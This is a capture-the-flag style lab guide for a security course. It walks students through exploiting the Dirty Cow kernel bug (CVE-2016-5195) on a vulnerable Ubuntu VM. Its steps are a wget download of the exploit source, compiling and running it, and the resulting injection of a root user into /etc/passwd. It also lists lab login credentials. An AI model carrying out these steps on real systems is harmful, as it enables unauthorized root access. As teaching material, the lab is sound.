Privilege Escalation via Dirty Cow Kernel Exploit

🌱 How to start this project?

The academy provides a virtual machine running a vulnerable version of Ubuntu Server (16.04.1) with a kernel affected by the Dirty Cow vulnerability (CVE-2016-5195).

As a student, you already have access to this system with a limited user called student. Your goal will be to identify that the system is vulnerable, compile and run a real exploit, and escalate your privileges to gain root access. This exercise simulates a realistic scenario where a local attacker, without administrative privileges, manages to fully compromise the system by exploiting a kernel vulnerability. The objectives are:

• Check the kernel version of a Linux system.
• Compile a real exploit using gcc.
• Escalate privileges from a limited user to root.
• Demonstrate the success of the attack by capturing a flag located in /root.

This type of exploitation is typical in advanced security audits and Red Team environments. It will help you connect low-level operating system concepts with real offensive techniques, in a practical and guided way.

Requirements

• Vulnerable Ubuntu machine with kernel 4.4.0-21-generic (or similar, unpatched)
• Access as a non-privileged user to the vulnerable machine (student:password123)

🚨 Legal Notice: This repository contains a clean and commented version of the Dirty Cow exploit (CVE-2016-5195), designed exclusively for educational purposes. This variant creates a new root-privileged user by exploiting a race condition in the Linux kernel memory subsystem. This exploit is for educational use only. It should be used in controlled and legal environments such as labs, practice virtual machines, or cybersecurity classes.

📝 Instructions

Step 1: Check the kernel version

1. Log in to the vulnerable machine with the limited user and run:

   1uname -a

   This will return something like:

   1Linux dirtycow-lab 4.4.0-31-generic #50-Ubuntu SMP Tue Sep 6 15:42:33 UTC 2016 x86_64 x86_64 x86_64 

2. Note the version and research how to exploit that vulnerability using databases like Exploit-DB, GitHub, or searchsploit from Kali.

   HELP: For this exercise, we provide you with a functional and documented exploit that you can download.

Step 2: Download the exploit

1. Use the following command to download the dirty.c file from the repository provided by the academy:

   1wget https://raw.githubusercontent.com/breatheco-de/kernel-exploit-dirtycow-project/refs/heads/main/assets/dirty.c

2. Once the file is downloaded, compile it with gcc:

   1gcc dirty.c -o dirty -pthread -lcrypt

   This will generate an executable called dirty ready to run.

3. Run the binary:

   1./dirty

   This exploit performs the following actions:

   • Creates a backup of /etc/passwd at /tmp/passwd.bak.
   • Injects a new line into /etc/passwd with a root-level user:

   1username: firefart  
   2password: firefart

Step 3: Escalate privileges

1. Once the exploit finishes running, switch users.
2. Verify that you now have access as root.
3. Finally, capture the flag. To confirm the success of the attack, read the contents of the flag file located in the /root/flag.txt directory. If everything worked correctly, you will see the flag's content.